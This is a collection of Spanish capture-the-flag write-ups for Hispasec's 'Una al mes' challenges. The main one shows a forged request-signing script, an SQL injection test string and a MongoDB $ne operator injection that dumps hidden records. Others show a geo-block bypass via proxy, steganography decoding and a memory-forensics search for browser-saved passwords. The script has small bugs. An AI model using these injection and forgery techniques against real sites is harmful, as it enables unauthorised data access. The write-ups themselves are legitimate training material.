  3 | 15/04/2019
  4 | 
  5 | julianjm - [blog](https://julianjm.github.io) - [telegram](https://t.me/julianjm)
  6 | 
  7 | ## El reto
  8 | 
  9 | > (<a href="https://unaalmes.hispasec.com/challenges#EPISODIO%202">Resumen</a>) Hay que destripar la siguiente web: `http://34.247.69.86/matrix/episodio2/index.php`
 10 | 
 11 | 
 12 | 
 13 | ## Primeros pasos
 14 | 
 15 | Al entrar, vemos información del primer registro (id: 1). Nuestra primera idea es intentar obtener los siguientes registros.
 16 | 
 17 | ```bash
 18 | curl "http://34.247.69.86/matrix/episodio2/index.php?id=2"
 19 | [...]
 20 | Undefined hash
 21 | ```
 22 | 
 23 | Nos dice que hash no está definido:
 24 | 
 25 | ```bash
 26 | curl "http://34.247.69.86/matrix/episodio2/index.php?id=2&hash=prueba"
 27 | [...]
 28 | Hash error
 29 | ```
 30 | 
 31 | Entendemos que el servidor espera algún tipo de firma... Probamos a pasar como hash el md5, sha1, sha256, del valor en id, pero siempre vemos el mismo error.
 32 | 
 33 | ## Javascript + Web Assembly
 34 | 
 35 | Investigamos un poco la web, y vemos que hace referencia a un par de ficheros javascript. Empezamos por index.min.js. Lo formateamos con el chrome (pinchando en{}) y obtenemos código parcialmente ofuscado. Buscando en google algunas constantes que aparecen, como 0x28955b88, vemos que se pertenece a una función que realiza el MD5. Vamos bien.
 36 | 
 37 | Al final del fichero vemos dos funciones. nono() nos trollea cada vez que hacemos un resize de la página. doIt() es extraña, porque nadie la llama:
 38 | 
 39 | ```javascript
 40 | function doIt(_0x3a59ab) {
 41 |     var _0x5482b3 = OMG(_0x3a59ab);
 42 |     var _0x32ea98 = '0x' + _0x5482b3[_0x3358('0x13')](0x0, 0x8);
 43 |     var _0x38175b = '0x' + _0x5482b3[_0x3358('0x13')](0x8, 0x8);
 44 |     var _0x49b2a5 = '0x' + _0x5482b3[_0x3358('0x13')](0x10, 0x8);
 45 |     var _0x340f9f = '0x' + _0x5482b3[_0x3358('0x13')](0x18, 0x8);
 46 |     return Module[_0x3358('0x14')](_0x32ea98, _0x38175b, _0x49b2a5, _0x340f9f);
 47 | }
 48 | ```
 49 | 
 50 | Después de desofuscarla nos queda esto:
 51 | ```javascript
 52 | function doIt(val) {
 53 |     var md5 = OMG(val);
 54 |     var p1 = '0x' + md5.substr(0, 8);
 55 |     var p2 = '0x' + md5.substr(8, 8);
 56 |     var p3 = '0x' + md5.substr(16, 8);
 57 |     var p4 = '0x' + md5.substr(24, 8);
 58 |     return Module['_calc'](p1, p2, p3, p4);
 59 | }
 60 | ```
 61 | 
 62 | Poniendo unos *console.log()* vemos que OMG está haciendo el MD5. Posteriormente divide ese hash en 4 partes de 8 `nibbles`, y se los pasa a la función *_calc*...
 63 | 
 64 | Probamos a llamarla desde la consola del navegador:
 65 | 
 66 | ```javascript
 67 | doIt(1)
 68 | 113948091
 69 | doIt(2)
 70 | -163535797
 71 | ```
 72 | 
 73 | La función *_calc* está definida en main.js. Este fichero parece autogenerado. Es una especie de interfaz entre el navegador y el fichero main.wasm, Web Assembly.
 74 | 
 75 | Usaremos wasmdec, que intenta decompilar los webassembly a C. El fichero que genera es bastante grande, pero buscando por *_calc*, vemos estas líneas:
 76 | 
 77 | ```c
 78 | /*
 79 | 	Function 'fn_4':
 80 | 		WASM name: '4'
 81 | 		Export name: '_calc'
 82 | */
 83 | 
 84 | int fn_4(int local_0, int local_1, int local_2, int local_3) { 
 85 |     // Quitamos mucha paja
 86 | 
 87 | 	local_11 = local_0;
 88 | 	local_12 = local_1;
 89 | 	local_13 = local_2;
 90 | 	local_14 = local_3;
 91 | 	local_16 = local_11;
 92 | 	local_4 = local_12;
 93 | 	local_5 = local_16 ^ local_4;
 94 | 	local_6 = local_13;
 95 | 	local_7 = local_5 ^ local_6;
 96 | 	local_8 = local_14;
 97 | 	local_9 = local_7 ^ local_8;
 98 | 	local_15 = local_9;
 99 | 	local_10 = local_15;
100 | 
101 | 	return local_10;    //Resumiendo ese churro, devuelve el xor entre los 4 parámetros.
102 | }
103 | ```
104 | 
105 | ## Generando hashes
106 | 
107 | Suponemos que el metodo de hashing utilizado es el de la función *_calc* que acabamos de ver, es decir, md5 y xor de sus 4 bloques de 4 bytes. Volvemos a la carga:
108 | 
109 | ```bash
110 | $ curl "http://34.247.69.86/matrix/episodio2/index.php?id=1&hash=113948091"
111 | [...]
112 | Hash error
113 | ```
114 | 
115 | Nos damos cabezazos contra el teclado mientras esperamos que liberen una pista:
116 | > El hash requerido utiliza la string "34.247.69.86/matrix/episodio2/index.php?id=(?)"
117 | 
118 | Aaaaamigo. Ya sabemos cómo firmar nuestras peticiones. Probamos con el id=1:
119 | 
120 | ```javascript
121 | doIt("34.247.69.86/matrix/episodio2/index.php?id=1")
122 | -1758453311
123 | ```
124 | 
125 | ```bash
126 | $ curl "http://34.247.69.86/matrix/episodio2/index.php?id=1&hash=-1758453311"
127 | [...]
128 | Hash error
129 | ```
130 | 
131 | Sigue fallando. En este punto ya tenía una función que calculaba los hashes en python, y resulta que los calcula como un entero sin signo. El mismo hash quedaría como 2536513985:
132 | 
133 | ```bash
134 | $ curl "http://34.247.69.86/matrix/episodio2/index.php?id=1&hash=2536513985"
135 | [...]
136 | Id: 1<br>Nombre: Morfeo<br>Sexo: Varon
137 | ```
138 | 
139 | Vamos bien. Como nota curiosa, la forma de convertir de entero con signo a sin signo en javascript es hacer uso del operador `>>>` (shift right), que convierte a unsigned. Si le pedimos que cambie 0 bits, nos deja el mismo valor, pero sin signo:
140 | 
141 | ```javascript
142 | doIt("34.247.69.86/matrix/episodio2/index.php?id=1") >>> 0
143 | 2536513985
144 | ```
145 | 
146 | ## Automatizando con Python
147 | 
148 | Ahora que sabemos cómo interactuar con la página, vamos a automatizarlo. 
149 | 
150 | ```python
151 | import hashlib
152 | import requests
153 | 
154 | def calc_hash(val):
155 |     m = hashlib.md5(str(val).encode()).hexdigest()
156 | 
157 |     p0 = int(m[ 0: 8], 16)
158 |     p1 = int(m[ 8:16], 16)
159 |     p2 = int(m[16:24], 16)
160 |     p3 = int(m[24:32], 16)
161 | 
162 |     return p0 ^ p1 ^ p2 ^ p3
163 | 
164 | if len(sys.argv)>1:
165 |     id=sys.argv[1]
166 |     datos_a_firmar="34.247.69.86/matrix/episodio2/index.php?id=" + str(id)
167 |     h=calc_hash(datos_a_firmar)
168 | 
169 |     r = requests.get("http://34.247.69.86/matrix/episodio2/index.php", {"id":id, "hash":h})
170 |     print(r.text)
171 | else:
172 |     print("python3 makerequest.py <id>)
173 | 
174 | ```
175 | 
176 | Con este script podemos generar peticiones para parámetrios id arbitrarios. Vemos que hay registros hasta el 7, pero el 8 devuelve vacío.
177 | Intentamos (con cuidado) probar hasta el 100, pero no encontramos nada.
178 | Intentamos también realizar inyecciones SQL del tipo `id="0' or '1'='1"`. Puede que esté más filtrado de la cuenta, o que directamente no sea SQL.
179 | 
180 | Probamos inyección para Mongodb. Se basa en hacer llegar un array (en lugar de un string) a la función que hace la consulta. La consulta `['id'=>$_GET['id']]`, que en condiciones normales compara *id* con un string, si conseguimos pasarle un array, podemos añadir modificadores.
181 | 
182 | Por ejemplo, `['id => ['$ne'=>'1']]` buscaría todos registros cuyo *id* sea distinto de 1.
183 | 
184 | Gracias a PHP, crear arrays es de lo más sencillo. Pasando ?id[hola]=mundo a la petición web, obtenemos en la parte php la siguiente variable $_GET['id'], que contiene el array [ "hola" => "mundo" ].
185 | 
186 | Modificamos la petición de la función anterior:
187 | 
188 | ```python
189 | r = requests.get("http://34.247.69.86/matrix/episodio2/index.php", {"id[$ne]":id, "hash":h})
190 | ```
191 | 
192 | Nota: Nos damos cuenta de que, aunque pasemos una array, el servidor sigue calculando el hash con el valor final de *id*, en lugar de con el array en sí, lo cual agradecemos, ya que complicaría la inyección enormemente... (o no, nunca lo sabremos, md5(array() devuelve NULL :))
193 | 
194 | ```html
195 | $ python3 makerequest.py 0
196 | [...]
197 | Id: 1<br>Nombre: Morfeo<br>Sexo: Varon
198 |  <br><br>Id: 2<br>Nombre: Trinity<br>Sexo: Mujer
199 |  <br><br>Id: 3<br>Nombre: Oraculo<br>Sexo: Mujer
200 |  <br><br>Id: 4<br>Nombre: Cypher<br>Sexo: Varon
201 |  <br><br>Id: 5<br>Nombre: Dozer<br>Sexo: Varon
202 |  <br><br>Id: 6<br>Nombre: Neo<br>Sexo: Varon
203 |  <br><br>Id: 7<br>Nombre: Mujer de rojo<br>Sexo: Mujer
204 |  <br><br>Id: 57069<br>Nombre: 125:101:115:173:61:60:66:67:62:64:60:71:60:145:64:142:62:70:146:64:62:145:67:63:70:66:62:60:141:64:60:67:65:67:146:62:175<br>Sexo: XXX
205 | ```
206 | 
207 | Bingo!
208 | 
209 | ## Última parte
210 | 
211 | Por fin vemos datos del último registro. Por fuerza bruta, con ese Id, habríamos tardado un buen rato. 
212 | 
213 | Solo nos falta decodificarlos. Una simple conversión a ASCII no funciona. Nos damos cuenta (despúes de un rato) que no hay ningún numero 8 ni 9. Podría ser octal.
214 | 
215 | ```bash
216 | $ NUMEROS=`echo 125:101:115:173:61:60:66:67:62:64:60:71:60:145:64:142:62:70:146:64:62:145:67:63:70:66:62:60:141:64:60:67:65:67:146:62:175 | tr ':' ' '`
217 | $ for n in $NUMEROS ; do rax2 ${n}o ; done | rax2 -s
218 | 
219 | UAM{106724090e4b28f42e738620a40757f2}
220 | ```
221 | 
222 | Ahí, abusando de radare :)
223 | 
224 | En fin, un buen reto, con muchos temas de los que aprender. Esperando al reto del próximo mes!
225 | 
226 | 


--------------------------------------------------------------------------------
/writeups/matrix/episodio2/nachinho3/nachinho3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio2/nachinho3/nachinho3-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/matrix/episodio3/arsenics/arsenics-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio3/arsenics/arsenics-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/matrix/episodio3/darkeagle/darkeagle-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio3/darkeagle/darkeagle-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/matrix/episodio3/j0n3/j0n3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio3/j0n3/j0n3-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/missions/mission02/1v4n/1v4n-mission02.txt:
--------------------------------------------------------------------------------
 1 | Buenas noches y felices fiestas, mi nick será "1v4n" estoy empezando y espero me perdonéis las incorrecciones.
 2 | 
 3 | URL publicación de la mision #002 : http://unaaldia.hispasec.com/2017/12/segunda-entrega-una-al-mes-mision-002.html
 4 | 
 5 | Texto:
 6 | "En esta misión Rick debe encontrar los datos ocultos en una imagen, pero tiene un problema, parece que no puede acceder a ella. Necesita tu ayuda..."
 7 | 
 8 | URL datos mision #002 : http://34.253.233.243/mission2.php
 9 | 
10 | Texto: "(ES)
11 | Hemos encontrado un servidor vulnerable de la empresa 'Santa Claus Inc' el cuál solo es accesible desde el país donde se encuentra la fábrica. Debemos de encontrar la manera de entrar y sacar la información oculta de la imagen que nos aparece.
12 | 
13 | Mucha suerte."
14 | 
15 | Nivel: Fácil (según el organizador)
16 | 
17 | Categoría: Esteganografía // Criptografía //...
18 | 
19 | URL del servidor: http://34.253.233.243/navidad/index.php
20 | 
21 | Pasos a la solución:
22 | 
23 | 1. La URL de la misión al visitarla nos da el siguiente análisis de codigo:
24 | 
25 | 
26 | 
27 | Postal
28 | 
29 | 
30 | 
31 | 2. Seguimos el link de Postal que nos presenta la index.php y como nos informa en el texto de la misión es inaccesible  con un si no es desde el país de "Santa Claus Inc" que según el análisis del anterior punto es Canada. El análisis de la URL visitada http://34.253.233.243/navidad/img/renitos.jpg es el siguiente de donde obtenemos un error 403:
32 | 
33 | 
34 | 
35 | 
36 | 
37 | Forbidden
38 | 
39 | You don't have permission to access /navidad/img/renitos.jpg
40 | on this server.
41 | 
42 | 
43 | 
44 | 
45 | Apache/2.4.25 (Debian) Server at 34.253.233.243 Port 80
46 | 
47 | 
48 | 
49 | 3. Con lo cual tomamos la decisión de utilizar un WebProxy que salga en Cánada a Internet que este caso será https://www.vpnbook.com/webproxy y sin más introducimos la URL http://34.253.233.243/navidad/img/renitos.jpg . Conseguimos el objetivo de visualizar renitos.jpg y lo descargamos a nuestro escritorio.
50 | 
51 | 4. Pero sospechábamos que no era tan sencillo y que renitos.jpg podría esconder un mensaje o un archivo como nos avisan en la misión. Pasamos a utilizar la herramienta de Steghide de Kali. Obteniendo el siguiente análisis:
52 | 
53 | 1v4n@kali:~/Escritorio$ steghide info renitos.jpg
54 | "renitos.jpg":
55 | formato: jpeg
56 | capacidad: 68,0 KB
57 | Intenta informarse sobre los datos adjuntos? (s/n) s
58 | Anotar salvoconducto:
59 | archivo adjunto "renitos.txt":
60 |   tamaño: 88,0 Byte
61 |   encriptado: rijndael-128, cbc
62 |   compactado: si
63 | 
64 | 5. Nos desvela que el archivo renitos.jpg esconde un archivo de texto en formato .txt y que vamos a extraer mediante:
65 | 
66 | 1v4n@kali:~/Escritorio$ steghide extract -sf renitos.jpg
67 | Anotar salvoconducto:
68 | anota los datos extraidos en"renitos.txt".
69 | 
70 | 6. El archivo reitos.txt esconde un texto codificado KVAU262NMVZHE6K7INUHE2LTORWWC427MFXGIX2IMFYHA6K7JZSXOX2ZMVQXEX3GOJXW2X2INFZXAYLTMVRX2=== que esta en base32. En este caso vamos a utilizar la herramienta online gratuita https://emn178.github.io/online-tools/ y por fin conseguimos la FLAG de este reto.
71 | 
72 | FLAG
73 | 
74 | UAM{Merry_Christmas_and_Happy_New_Year_from_Hispasec}
75 | 


--------------------------------------------------------------------------------
/writeups/missions/mission02/nachinho3/nachinho3-mission02.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission02/nachinho3/nachinho3-mission02.pdf


--------------------------------------------------------------------------------
/writeups/missions/mission03/nachinho3/nachinho3-mission03.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission03/nachinho3/nachinho3-mission03.pdf


--------------------------------------------------------------------------------
/writeups/missions/mission04/j0n3/j0n3-mission04.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission04/j0n3/j0n3-mission04.pdf


--------------------------------------------------------------------------------
/writeups/missions/mission05/j0n3/j0n3-mission05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission05/j0n3/j0n3-mission05.pdf


--------------------------------------------------------------------------------
/writeups/missions/mission05/nachinho3/nachinho3-mission05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission05/nachinho3/nachinho3-mission05.pdf


--------------------------------------------------------------------------------
/writeups/missions/mission05/percu/percu-mission05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission05/percu/percu-mission05.pdf


--------------------------------------------------------------------------------
/writeups/missions/mission05/rafamartos/rafamartos-mission05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission05/rafamartos/rafamartos-mission05.pdf


--------------------------------------------------------------------------------
/writeups/missions/mission06/1v4n/1v4n-mission06.txt:
--------------------------------------------------------------------------------
  1 | Descripción
  2 | 
  3 | Nombre:  Misión#006
  4 | 
  5 | Fecha de liberación: 15 de Abril del 2018
  6 | 
  7 | Dificultad: Fácil (según los retadores)
  8 | 
  9 | Información personal:
 10 | 
 11 | Nombre: Beatrix Michelle Kiddo 
 12 | Año de nacimiento: 1976 
 13 | Trabajo: Ex Asesina 
 14 | Afiliación: Antiguamente en 'Deadly Viper Assasination Squad' 
 15 | 
 16 | Misión:
 17 | 
 18 | Introducción:
 19 | 
 20 | La flag escondida en esta prueba te va a dar a escoger entre dos opciones. Esperemos que escojas bien, sino vas a recibir las consecuencias…
 21 | 
 22 | Información adicional:
 23 | 
 24 | URL conseguida: goo.gl/YUNxSu
 25 | 
 26 | Esta vez seremos "La Mamba Negra" una ex-asesina, después de su incidente en la capilla juró vengarse y nosotros deberemos ayudarle en su misión.
 27 | 
 28 | Objetivo
 29 | 
 30 | Formato de flag: UAM{flag}
 31 | 
 32 | Herramientas utilizadas
 33 | 
 34 | Chrome (66.0.3359.106) https://www.google.com/chrome/
 35 | file (5.33) https://github.com/file/file // http://freshmeat.sourceforge.net/projects/file/ 
 36 | strings (2.30)
 37 | curl (7.59) https://github.com/curl/curl //  https://curl.haxx.se/ 
 38 | hashID | hash-identifier (3.1.4) https://github.com/psypanda/hashID
 39 | https://md5online.org
 40 | https://29a.ch/photo-forensics/#forensic-magnifier
 41 | https://gchq.github.io/CyberChef/
 42 | 
 43 | Resumen:
 44 | 
 45 | Comenzamos por visitar la página de la misión donde se nos entrega la url como única pista.
 46 | 
 47 | Visitamos la url acortada de google ( https://goo.gl/YUNxSu ) con el navegador la cual hace una redirección al Drive de Google en:
 48 | https://drive.google.com/file/d/1J2mMiIwqZ_pgRBEUEccyepJrBPH3c_FA/view 
 49 | 
 50 | Descargamos en la parte superior derecha de la pantalla o utilizamos con curl la descarga del archivo llamado bill2.jpg que nos arroja un fotograma de la película donde se muestra a la actriz Uma Thurman como el personaje de Beatrix:
 51 | 
 52 | 
 53 | $ curl -L -o bill2.jpg 'https://drive.google.com/uc?export=download&id=1J2mMiIwqZ_pgRBEUEccyepJrBPH3c_FA'
 54 | 
 55 | Al descargar el archivo bill2.jpg su análisis inicial nos arroja:
 56 | 
 57 | $ file bill2.jpg
 58 | bill2.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1200x630, frames 3
 59 | 
 60 | $ strings bill2.jpg
 61 | JFIF
 62 | …
 63 | aa81a304ea2a25ad2947a03062c05fdf
 64 | 
 65 | Podemos observar que nos arroja un hash (una cadena de 32 bits). Para poder identificarlo lanzamos la tool hash-identifier:
 66 | 
 67 | $ hashid aa81a304ea2a25ad2947a03062c05fdf
 68 | Analyzing 'aa81a304ea2a25ad2947a03062c05fdf'
 69 | [+] MD2
 70 | [+] MD5
 71 | [+] MD4
 72 | [+] Double MD5
 73 | [+] LM
 74 | [+] RIPEMD-128
 75 | [+] Haval-128
 76 | [+] Tiger-128
 77 | [+] Skein-256(128)
 78 | [+] Skein-512(128)
 79 | [+] Lotus Notes/Domino 5
 80 | [+] Skype
 81 | [+] Snefru-128
 82 | [+] NTLM
 83 | [+] Domain Cached Credentials
 84 | [+] Domain Cached Credentials 2
 85 | [+] DNSSEC(NSEC3)
 86 | [+] RAdmin v2.x
 87 | 
 88 | Optamos por el hash más común MD5 y nos ayudamos de la herramienta online https://md5online.org/md5-decrypt.html y obtenemos:
 89 | 
 90 | Found : goo.gl/4kxSs7
 91 | (hash = aa81a304ea2a25ad2947a03062c05fdf)
 92 | 
 93 | Hemos obtenido una url acortada de Google ( https://goo.gl/4kxSs7 ) redireccionándonos a https://drive.google.com/file/d/18nlxec8n1ziQJmSXOMfa1e4IoG1FsPRA/view a un archivo llamado kill-bill-movie.png imagen de nuevo de nuestra protagonista Beatrix:
 94 | 
 95 | $ curl -L -o kill-bill-movie.png 'https://drive.google.com/uc?export=download&id=18nlxec8n1ziQJmSXOMfa1e4IoG1FsPRA'
 96 | 
 97 | Al descargar el archivo kill-bill-movie.png su análisis inicial nos arroja:
 98 | 
 99 | $ file kill-bill-movie.png
100 | kill-bill-movie.png: PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
101 | 
102 | Comprobamos strings y binwalk sin arrojarnos nada significativo ni que oculte ningún otro archivo diferente a la imagen :
103 | 
104 | $ binwalk kill-bill-movie.png
105 | 
106 | DECIMAL       HEXADECIMAL     DESCRIPTION
107 | --------------------------------------------------------------------------------
108 | 0             0x0             PNG image, 1920 x 1080, 8-bit/color RGBA, non-interlaced
109 | 180           0xB4            Zlib compressed data, best compression
110 | 
111 | Documentandose en Google y observando que no esconde ningún archivo, nos enfrentamos a un reto de esteganografía.
112 | 
113 | Lanzamos varias tools bastante utilizadas en esteganografía como steghide, stegosuite y openstego sin obtener ningún resultado.
114 | 
115 | Tomando la orientación que la esteganografía podría ser más visual utilizamos la herramienta online https://29a.ch/photo-forensics/#forensic-magnifier
116 | 
117 | 
118 | Jugando con el cursor por encima de la imagen de Beatrix detectamos un código Morse a los pies de la protagonista, obteniendo la siguiente cadena. 
119 | 
120 | ...- ..- ..-. -. . ----- ... -..- - --. -..- ..-. --.- .--- ..-. -- -... ..-. ----. ...- -..- .---- .--- .-.. - - -... ----.
121 | 
122 | Añadir que con la tool  en Java de StegSolve 1.3 by Caesum también pudimos ver la misma cadena.
123 | 
124 | Decodificando nos da el siguiente string:
125 | 
126 | VUFNE0SXTGXFQJFMBF9VX1JLTTB9
127 | 
128 | Analizamos el siguiente string en https://md5hashing.net/hash_type_checker arrojandonos que lo identifica como base64
129 | 
130 | $ echo -n VUFNE0SXTGXFQJFMBF9VX1JLTTB9 | base64 -d
131 | UAMD�Le�@�L_U_RKM0}
132 | 
133 | La decodificación nos da un resultado muy cercano al formato de la flag que es UAM{flag} . 
134 | 
135 | A partir de aquí viene un punto de inflexión y de comprobar que el resultado de decodificar un MORSE siempre será un resultado en MAYÚSCULAS pero una cadena de base64 varía dependiendo de las mayúsculas y las minúsculas (Case Sensitive).
136 | 
137 | Nos ayudamos de una navaja suiza online CyberChef:
138 | 
139 | https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)&input=VlVGTkUwU1hUR1hGUUpGTUJGOVZYMUpMVFRCOQ
140 | 
141 | Que nos permite jugar con el string de base64 hasta conseguir una flag dentro de formato y con sentido quedando el base64 de esta forma: 
142 | 
143 | VUFNe0sxTGxfQjFMbF9vX1JlTTB9
144 | 
145 | Y la solución
146 | 
147 | La flag es: UAM{K1Ll_B1Ll_o_ReM0}
148 | 


--------------------------------------------------------------------------------
/writeups/missions/mission06/nachinho3/nachinho3-mission06.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission06/nachinho3/nachinho3-mission06.pdf


--------------------------------------------------------------------------------
/writeups/missions/mission06/rafamartos/rafamartos-mission06.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/missions/mission06/rafamartos/rafamartos-mission06.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/1v4n/1v4n-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/1v4n/1v4n-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/arsenics/arsenics-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/arsenics/arsenics-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/bicacaro/bicacaro-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/bicacaro/bicacaro-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/darkeagle/darkeagle-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/darkeagle/darkeagle-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/j0n3/j0n3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/j0n3/j0n3-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/nachinho3/nachinho3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/nachinho3/nachinho3-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/percu/percu-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/percu/percu-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/rafamartos/rafamartos-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/rafamartos/rafamartos-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/ramonsola/ramonsola-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/siliconvalley/episodio1/ramonsola/ramonsola-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/siliconvalley/episodio1/rubenansotegui/rubenansotegui-episodio1.txt:
--------------------------------------------------------------------------------
 1 | WriteUp: SILICON VALLEY - EPISODIO 1
 2 | 
 3 | Se descarga el fichero del enlace: http://www.mediafire.com/file/31pj2a5umpfm345/GILFOYLE-HELLDD.zip y se descomprime.
 4 | 
 5 | Se identifica la imagen con la herramienta volatility (ya por el tamaño 2G apunta a un volcado de memoría):
 6 | vol.py imageinfo -f GILFOYLE-HELLDD.raw
 7 | 
 8 | INFO    : volatility.debug    : Determining profile based on KDBG search...
 9 | WARNING : volatility.debug    : Cannot find a 32-bit equivalent profile. The WoW64 plugins (dlllist, ldrmodules, etc) may not work.
10 | WARNING : volatility.debug    : Cannot find a 32-bit equivalent profile. The WoW64 plugins (dlllist, ldrmodules, etc) may not work.
11 | WARNING : volatility.debug    : Cannot find a 32-bit equivalent profile. The WoW64 plugins (dlllist, ldrmodules, etc) may not work.
12 |           Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
13 |                      AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
14 |                      AS Layer2 : FileAddressSpace (GILFOYLE-HELLDD.raw)
15 |                       PAE type : No PAE
16 |                            DTB : 0x187000L
17 |                           KDBG : 0xf800029f00a0L
18 |           Number of Processors : 1
19 |      Image Type (Service Pack) : 1
20 |                 KPCR for CPU 0 : 0xfffff800029f1d00L
21 |              KUSER_SHARED_DATA : 0xfffff78000000000L
22 |            Image date and time : 2018-09-15 09:56:27 UTC+0000
23 |      Image local date and time : 2018-09-15 11:56:27 +0200
24 | 
25 | Realizamos un escaneo de todos los ficheros presentes en el volcado de memoria.
26 | vol.py -f GILFOYLE-HELLDD.raw --profile=Win7SP1x64 filescan > filelist.txt
27 | 
28 | En este momento, se da varias vueltas revisando todos los ficheros interesantes. Para ello abrimos el fichero resultante con Notepad++ y quedándonos sólo con la ruta, lo ordenamos alfabéticamente y prestamos atención a las carpetas más características entre ellas \Device\HarddiskVolume2\Users\unaalmes\.
29 | Como buscamos unas credenciales de una página web probamos sin éxito en las contraseñas guardadas de los navegadores.
30 |  - Firefox: aunque se encuentra el fichero key4.db (que contiene la clave maestra de cifrado) en la ruta \Device\HarddiskVolume2\Users\unaalmes\AppData\Roaming\Mozilla\Firefox\Profiles\diwevb8u.default-1517848615580, no se encuentra el fichero con los logins cifrados logins.json.
31 |  - Internet Explorer: tras varias vueltas a claves del registro mediante las funciones hivelist, hivedump y printkey de volatility sin éxito, se acaba descartando esta vía.
32 | 
33 | Finalmente se repasan los ficheros otra vez y se encuentra el fichero info.odt en la carpeta de descargas del usuario:
34 | 0x000000007fcabd50	1	1	RW-r--	\Device\HarddiskVolume2\Users\unaalmes\Desktop\info.odt
35 | 
36 | Se obtiene mediante volatility:
37 | vol.py -f GILFOYLE-HELLDD.raw --profile=Win7SP1x64 dumpfiles -n -S summary.txt -D .\imagefiles\ -Q 0x000000007fcabd50
38 | Volatility Foundation Volatility Framework 2.6
39 | DataSectionObject 0x7fcabd50   None   \Device\HarddiskVolume2\Users\unaalmes\Desktop\info.odt
40 | 
41 | Se abre el fichero y su contenido se copia a Notepad++ para facilitar su manipulación.
42 | Tras revisarlo varias veces se empieza a observar que hay patrones repetidos por lo que inicialmente se piensa que se trata de un cifrado por substitución pero de varios caracteres (1 a N) en vez de 1 a 1.
